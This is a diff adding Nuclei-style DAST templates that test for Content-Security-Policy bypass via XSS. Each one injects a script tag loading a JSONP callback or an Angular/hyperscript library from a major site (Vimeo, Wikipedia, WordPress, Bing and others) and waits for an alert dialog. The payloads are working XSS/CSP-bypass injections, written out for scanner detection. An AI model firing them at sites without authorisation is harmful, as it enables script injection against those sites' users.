+  tags: xss,csp-bypass,indeed
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://uk.indeed.com/m/newjobs?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: uk_indeed_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "uk_indeed_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml
new file mode 100644
index 00000000000..740cc8c9b1a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ulogin-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via ULogin
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,ulogin
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://ulogin.ru/token.php?callback=alert(1337)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: ulogin_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "ulogin_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml
new file mode 100644
index 00000000000..b19d7d86e78
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: unpkg-angular-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Unpkg Angular
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,unpkg
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://unpkg.com/angular@1.8.3/angular.min.js"></script><div ng-app><img src=x ng-on-error="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: unpkg_angular_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "unpkg_angular_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml b/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml
new file mode 100644
index 00000000000..af132775dcf
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: unpkg-hyperscript-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Unpkg Hyperscript
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,unpkg
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://unpkg.com/hyperscript.org"></script><x _="on load alert(1)">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: unpkg_hyperscript_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "unpkg_hyperscript_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml
new file mode 100644
index 00000000000..c559750d741
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: urs-pbs-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via PBS URS
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,pbs
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://urs.pbs.org/redirect/1/?format=jsonp&callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: urs_pbs_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "urs_pbs_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml
new file mode 100644
index 00000000000..cc9de711696
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: vimeo-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Vimeo
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,vimeo
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://vimeo.com/api/v2/video/1006042481.json?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: vimeo_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "vimeo_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml b/dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml
deleted file mode 100644
index c285f081a3c..00000000000
--- a/dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: virtualearth-csp-xss
-
-info:
-  name: Content-Security-Policy Bypass via Virtualearth
-  author: DhiyaneshDK
-  severity: high
-  reference:
-    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L210C1-L210C21
-  metadata:
-    verified: true
-  tags: xss,csp-bypass,virtualearth
-
-http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
-
-    payloads:
-      injection:
-        - '<script src="https://dev.virtualearth.net/REST/v1/Imagery/Metadata/Road?jsonp=alert(document.domain);//"></script>'
-
-    fuzzing:
-      - part: query
-        type: replace
-        mode: single
-        fuzz:
-          - "{{injection}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "{{injection}}"
-
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
-
-      - type: word
-        part: content_security_policy
-        words:
-          - "virtualearth.net"
-          - "script-src"
-        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml b/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml
new file mode 100644
index 00000000000..3b61cc1b908
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: visitor-pixplug-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Pixplug Visitor
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,pixplug
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://visitor.pixplug.in/jsonp/getdata.php?callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: visitor_pixplug_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "visitor_pixplug_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml b/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml
new file mode 100644
index 00000000000..19002ae5e5e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: visitor-service-tealiumiq-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via TealiumIQ Visitor Service
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,tealiumiq
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://visitor-service.tealiumiq.com/northwesternmutual/main/q?callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: visitor_service_tealiumiq_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "visitor_service_tealiumiq_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml
new file mode 100644
index 00000000000..55629180057
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: vk-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via VK API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,vk
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: vk_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "vk_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml
new file mode 100644
index 00000000000..cb01bd49eb5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wb-amap-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Amap WB
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,amap
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://wb.amap.com/channel.php?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: wb_amap_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "wb_amap_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml
new file mode 100644
index 00000000000..cdfc3627cf1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: widget-usersnap-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Usersnap Widget
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,usersnap
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://widget.usersnap.com/load/d5abc654-0976-45b9-8074-fa5e721db433?onload=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: widget_usersnap_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "widget_usersnap_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml b/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml
new file mode 100644
index 00000000000..7be61d69a52
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: widgets-pinterest-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Pinterest Widgets
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,pinterest
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://widgets.pinterest.com/v3/pidgets/boards/ciciwin/hedgehog-squirrel-crafts/pins/?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: widgets_pinterest_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "widgets_pinterest_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml
new file mode 100644
index 00000000000..76d58cfbfa0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wikipedia-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Wikipedia API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,wikipedia
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://en.wikipedia.org/w/api.php?action=opensearch&format=json&limit=5&callback=alert&search=renniepak"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: wikipedia_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "wikipedia_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml
new file mode 100644
index 00000000000..3ee7807ea53
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wordpress-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via WordPress API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,wordpress
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.wordpress.org/stats/plugin/1.0/?slug=x&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: wordpress_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "wordpress_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml
new file mode 100644
index 00000000000..7c030ec3b51
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wordpress-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via WordPress API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,wordpress
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://wordpress.org/wp-json/wp/v2/posts/?_jsonp=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: wordpress_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "wordpress_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml b/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml
new file mode 100644
index 00000000000..0333978a2a0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: wse-api-here-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via HERE API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,here
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://wse.api.here.com/v8/findsequence2?apiKey=PJy8lvw9xxcCnYDFFsp8IvQB_l7ScobQmQ2xttBWfuQ&jsonCallback=alert(origin);void&mode=TransportModes"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: wse_api_here_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "wse_api_here_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml
new file mode 100644
index 00000000000..900a228c344
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-ancestrycdn-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Ancestry CDN
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,ancestrycdn
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="https://www.ancestrycdn.com/ui-static/lib/angular/1.2.3/angular.min.js"></script><div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == \'window\'">{{ [1].reduce(value.alert, 1); }}</div></div></div></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_ancestrycdn_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_ancestrycdn_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml
new file mode 100644
index 00000000000..c2fd0c94538
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-api-ibm-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via IBM API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,ibm
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www-api.ibm.com/search/typeahead/v1?lang=en&cc=us&query=l&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_api_ibm_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_api_ibm_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml
new file mode 100644
index 00000000000..7e27eecdcee
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-bing-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Bing API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,bing
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.bing.com/api/maps/mapcontrol?key=AlSfV3wSTlPFqxEdS97v1d1ZK25Qg4OxZerOAjFYQPZwtY4bQqhz4jDRou_kCmbJ&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_bing_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_bing_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml
new file mode 100644
index 00000000000..5411b007ad8
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-blogger-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Blogger API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,blogger
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.blogger.com/feeds/8063678697117239807/posts/default?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_blogger_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_blogger_csp_xss == true" 
\ No newline at end of file
